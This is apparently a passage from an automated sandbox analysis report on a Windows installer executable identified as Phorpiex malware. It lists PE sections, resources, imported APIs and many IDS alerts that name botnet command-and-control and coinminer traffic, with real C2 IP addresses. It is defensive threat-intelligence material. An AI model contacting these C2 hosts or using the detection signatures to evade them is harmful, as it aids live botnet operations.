IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6f10	0x7000	f569e353af0ed51bf4c216faa9bed4e7	False	0.6574009486607143	data	6.497884651859417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a92	0x2c00	91eee43954e068e650f7b73a8b0e6915	False	0.353515625	data	4.393893650965181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	db9f7acbf1c3ddfe255077b699955dfa	False	0.1953125	data	1.472782260995971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x4569000	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x45dc000	0x5ec48	0x5ee00	242e1d9fa4a81b3fe59b515ed782f12c	False	0.09209794960474309	data	3.968426157441028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x463b000	0xf8a	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.zero	0x463c000	0xdb0	0x1000	a789ccda75028397c9da51dd6fadaa07	False	0.47998046875	data	5.344870214596423	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x45dca60	0x666	Device independent bitmap graphic, 96 x 16 x 8, image size 1538, resolution 2868 x 2868 px/m, 15 important colors	English	United States	0.18192918192918192
RT_ICON	0x45dd0c8	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144	English	United States	0.05414681776489037
RT_ICON	0x461f0f0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.1255619306754998
RT_ICON	0x462f918	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.22006376948512046
RT_ICON	0x4633b40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.2940871369294606
RT_ICON	0x46360e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.44090056285178236
RT_ICON	0x4637190	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.7163120567375887
RT_DIALOG	0x46375f8	0xb4	data	English	United States	0.6111111111111112
RT_DIALOG	0x46376b0	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x46377d0	0x18c	data	English	United States	0.5631313131313131
RT_DIALOG	0x4637960	0x200	data	English	United States	0.3984375
RT_DIALOG	0x4637b60	0xf8	data	English	United States	0.6290322580645161
RT_DIALOG	0x4637c58	0xa0	data	English	United States	0.60625
RT_DIALOG	0x4637cf8	0xee	data	English	United States	0.6260504201680672
RT_DIALOG	0x4637de8	0xa0	data	English	United States	0.6
RT_DIALOG	0x4637e88	0x10c	data	English	United States	0.5111940298507462
RT_DIALOG	0x4637f98	0x178	data	English	United States	0.5585106382978723
RT_DIALOG	0x4638110	0x1ec	data	English	United States	0.3861788617886179
RT_DIALOG	0x4638300	0xe4	data	English	United States	0.6359649122807017
RT_DIALOG	0x46383e8	0x8c	data	English	United States	0.5857142857142857
RT_DIALOG	0x4638478	0xda	data	English	United States	0.6376146788990825
RT_DIALOG	0x4638558	0xa4	data	English	United States	0.6158536585365854
RT_DIALOG	0x4638600	0x110	data	English	United States	0.5183823529411765
RT_DIALOG	0x4638710	0x17c	data	English	United States	0.5657894736842105
RT_DIALOG	0x4638890	0x1f0	data	English	United States	0.3911290322580645
RT_DIALOG	0x4638a80	0xe8	data	English	United States	0.6508620689655172
RT_DIALOG	0x4638b68	0x90	data	English	United States	0.6041666666666666
RT_DIALOG	0x4638bf8	0xde	data	English	United States	0.6486486486486487
RT_DIALOG	0x4638cd8	0xa0	data	English	United States	0.60625
RT_DIALOG	0x4638d78	0x10c	data	English	United States	0.5111940298507462
RT_DIALOG	0x4638e88	0x178	data	English	United States	0.5611702127659575
RT_DIALOG	0x4639000	0x1ec	data	English	United States	0.3861788617886179
RT_DIALOG	0x46391f0	0xe4	data	English	United States	0.6447368421052632
RT_DIALOG	0x46392d8	0x8c	data	English	United States	0.5928571428571429
RT_DIALOG	0x4639368	0xda	data	English	United States	0.6422018348623854
RT_DIALOG	0x4639448	0xac	data	English	United States	0.6337209302325582
RT_DIALOG	0x46394f8	0x118	data	English	United States	0.5321428571428571
RT_DIALOG	0x4639610	0x184	data	English	United States	0.5747422680412371
RT_DIALOG	0x4639798	0x1f8	data	English	United States	0.4027777777777778
RT_DIALOG	0x4639990	0xf0	data	English	United States	0.6666666666666666
RT_DIALOG	0x4639a80	0x98	data	English	United States	0.625
RT_DIALOG	0x4639b18	0xe6	data	English	United States	0.6565217391304348
RT_DIALOG	0x4639c00	0xb4	data	English	United States	0.6833333333333333
RT_DIALOG	0x4639cb8	0x120	data	English	United States	0.5381944444444444
RT_DIALOG	0x4639dd8	0x18c	data	English	United States	0.5883838383838383
RT_DIALOG	0x4639f68	0x200	data	English	United States	0.4140625
RT_DIALOG	0x463a168	0xf8	data	English	United States	0.6653225806451613
RT_DIALOG	0x463a260	0xa0	data	English	United States	0.68125
RT_DIALOG	0x463a300	0xee	data	English	United States	0.6512605042016807
RT_GROUP_ICON	0x463a3f0	0x5a	data	English	United States	0.7666666666666667
RT_VERSION	0x463a450	0x430	data			0.4123134328358209
RT_MANIFEST	0x463a880	0x3c8	XML 1.0 document, ASCII text, with very long lines (968), with no line terminators	English	United States	0.5196280991735537

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, CloseHandle, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrcpynA
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T17:31:34.169860+0100	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.2.11	50039	185.215.113.66	5152	TCP
2024-12-05T17:31:34.169860+0100	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	185.215.113.66	80	192.168.2.11	49710	TCP
2024-12-05T17:31:34.169860+0100	2853272	ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound	1	185.215.113.66	80	192.168.2.11	49710	TCP
2024-12-05T17:31:40.487004+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.11	49710	185.215.113.66	80	TCP
2024-12-05T17:31:40.488686+0100	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	185.215.113.66	80	192.168.2.11	49710	TCP
2024-12-05T17:31:43.307087+0100	2856563	ETPRO MALWARE Phorpiex Domain in DNS Lookup	1	192.168.2.11	63463	1.1.1.1	53	UDP
2024-12-05T17:31:45.063425+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49721	185.215.113.66	80	TCP
2024-12-05T17:31:52.642676+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49721	185.215.113.66	80	TCP
2024-12-05T17:31:52.642676+0100	2853292	ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin	1	192.168.2.11	49721	185.215.113.66	80	TCP
2024-12-05T17:31:56.247698+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49747	185.215.113.66	80	TCP
2024-12-05T17:31:56.247698+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49747	185.215.113.66	80	TCP
2024-12-05T17:31:58.006372+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	95.81.102.72	40500	UDP
2024-12-05T17:31:59.111763+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:31:59.111763+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:03.043155+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	92.38.19.10	40500	UDP
2024-12-05T17:32:04.849116+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:04.849116+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:05.059911+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49775	185.215.113.66	80	TCP
2024-12-05T17:32:05.059911+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.11	49775	185.215.113.66	80	TCP
2024-12-05T17:32:07.374436+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:07.374436+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:08.039333+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	45.150.24.42	40500	UDP
2024-12-05T17:32:11.707461+0100	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	92.255.85.66	5188	192.168.2.11	49792	TCP
2024-12-05T17:32:12.945904+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:12.945904+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:13.051634+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	2.187.91.108	40500	UDP
2024-12-05T17:32:13.190239+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49793	185.215.113.84	80	TCP
2024-12-05T17:32:15.415639+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:15.415639+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:18.068485+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	109.74.69.43	40500	UDP
2024-12-05T17:32:21.799108+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:21.799108+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:24.736506+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:24.736506+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:28.290139+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	2.133.136.145	40500	UDP
2024-12-05T17:32:30.897343+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49833	91.202.233.141	80	TCP
2024-12-05T17:32:30.926727+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:30.926727+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:33.313347+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	2.176.72.136	40500	UDP
2024-12-05T17:32:33.492490+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49838	185.215.113.66	80	TCP
2024-12-05T17:32:33.492490+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49838	185.215.113.66	80	TCP
2024-12-05T17:32:38.355798+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	89.236.217.71	40500	UDP
2024-12-05T17:32:41.753669+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:41.753669+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:43.364147+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	89.219.115.156	40500	UDP
2024-12-05T17:32:44.277680+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:44.277680+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:47.058413+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:47.058413+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:48.383200+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	213.230.126.39	40500	UDP
2024-12-05T17:32:49.525535+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:49.525535+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:52.001242+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:52.001242+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:53.380543+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	2.179.117.33	40500	UDP
2024-12-05T17:32:56.706016+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49903	185.215.113.66	80	TCP
2024-12-05T17:32:56.706016+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49903	185.215.113.66	80	TCP
2024-12-05T17:32:58.401795+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	217.30.162.161	40500	UDP
2024-12-05T17:33:00.283137+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49912	185.215.113.66	80	TCP
2024-12-05T17:33:00.283137+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49912	185.215.113.66	80	TCP
2024-12-05T17:33:03.441463+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	95.59.165.102	40500	UDP
2024-12-05T17:33:04.389434+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49922	185.215.113.66	80	TCP
2024-12-05T17:33:04.389434+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49922	185.215.113.66	80	TCP
2024-12-05T17:33:08.017766+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49933	185.215.113.66	80	TCP
2024-12-05T17:33:08.017766+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49933	185.215.113.66	80	TCP
2024-12-05T17:33:08.475109+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	90.156.160.30	40500	UDP
2024-12-05T17:33:11.536043+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49941	185.215.113.66	80	TCP
2024-12-05T17:33:11.536043+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49941	185.215.113.66	80	TCP
2024-12-05T17:33:13.491162+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	88.204.241.182	40500	UDP
2024-12-05T17:33:16.187905+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49953	91.202.233.141	80	TCP
2024-12-05T17:33:16.187905+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49953	91.202.233.141	80	TCP
2024-12-05T17:33:19.696726+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49963	91.202.233.141	80	TCP
2024-12-05T17:33:19.696726+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49963	91.202.233.141	80	TCP
2024-12-05T17:33:23.261472+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49971	91.202.233.141	80	TCP
2024-12-05T17:33:23.261472+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49971	91.202.233.141	80	TCP
2024-12-05T17:33:26.948685+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49981	91.202.233.141	80	TCP
2024-12-05T17:33:26.948685+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49981	91.202.233.141	80	TCP
2024-12-05T17:33:28.529779+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	154.71.253.54	40500	UDP
2024-12-05T17:33:30.498877+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49991	91.202.233.141	80	TCP
2024-12-05T17:33:30.498877+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	49991	91.202.233.141	80	TCP
2024-12-05T17:33:33.520524+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	92.124.152.236	40500	UDP
2024-12-05T17:33:35.287748+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50003	185.215.113.66	80	TCP
2024-12-05T17:33:35.287748+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50003	185.215.113.66	80	TCP
2024-12-05T17:33:38.540485+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	90.156.162.5	40500	UDP
2024-12-05T17:33:38.893392+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50010	185.215.113.66	80	TCP
2024-12-05T17:33:38.893392+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50010	185.215.113.66	80	TCP
2024-12-05T17:33:42.671566+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50020	185.215.113.66	80	TCP
2024-12-05T17:33:42.671566+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50020	185.215.113.66	80	TCP
2024-12-05T17:33:46.277185+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50028	185.215.113.66	80	TCP
2024-12-05T17:33:46.277185+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50028	185.215.113.66	80	TCP
2024-12-05T17:33:49.902410+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50031	185.215.113.66	80	TCP
2024-12-05T17:33:49.902410+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50031	185.215.113.66	80	TCP
2024-12-05T17:33:53.590550+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	151.242.48.19	40500	UDP
2024-12-05T17:33:54.656231+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50033	91.202.233.141	80	TCP
2024-12-05T17:33:54.656231+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50033	91.202.233.141	80	TCP
2024-12-05T17:33:58.212808+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50035	91.202.233.141	80	TCP
2024-12-05T17:33:58.212808+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50035	91.202.233.141	80	TCP
2024-12-05T17:34:01.914153+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50036	91.202.233.141	80	TCP
2024-12-05T17:34:01.914153+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50036	91.202.233.141	80	TCP
2024-12-05T17:34:03.604243+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	178.67.165.88	40500	UDP
2024-12-05T17:34:05.860091+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50038	91.202.233.141	80	TCP
2024-12-05T17:34:05.860091+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50038	91.202.233.141	80	TCP
2024-12-05T17:34:08.634390+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	31.47.175.39	40500	UDP
2024-12-05T17:34:10.077835+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50041	91.202.233.141	80	TCP
2024-12-05T17:34:10.077835+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50041	91.202.233.141	80	TCP
2024-12-05T17:34:13.675559+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	189.173.142.192	40500	UDP
2024-12-05T17:34:15.521961+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50043	185.215.113.66	80	TCP
2024-12-05T17:34:15.521961+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50043	185.215.113.66	80	TCP
2024-12-05T17:34:18.713529+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	198.163.204.6	40500	UDP
2024-12-05T17:34:19.357396+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50045	185.215.113.66	80	TCP
2024-12-05T17:34:19.357396+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50045	185.215.113.66	80	TCP
2024-12-05T17:34:23.229363+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50046	185.215.113.66	80	TCP
2024-12-05T17:34:23.229363+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50046	185.215.113.66	80	TCP
2024-12-05T17:34:23.722460+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	85.9.133.202	40500	UDP
2024-12-05T17:34:27.083721+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50048	185.215.113.66	80	TCP
2024-12-05T17:34:27.083721+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50048	185.215.113.66	80	TCP
2024-12-05T17:34:28.755066+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	37.21.118.106	40500	UDP
2024-12-05T17:34:30.871341+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50050	185.215.113.66	80	TCP
2024-12-05T17:34:30.871341+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50050	185.215.113.66	80	TCP
2024-12-05T17:34:33.775801+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	38.222.194.190	40500	UDP
2024-12-05T17:34:36.240351+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50052	91.202.233.141	80	TCP
2024-12-05T17:34:36.240351+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50052	91.202.233.141	80	TCP
2024-12-05T17:34:38.819079+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	78.109.103.103	40500	UDP
2024-12-05T17:34:40.418042+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50054	91.202.233.141	80	TCP
2024-12-05T17:34:40.418042+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50054	91.202.233.141	80	TCP
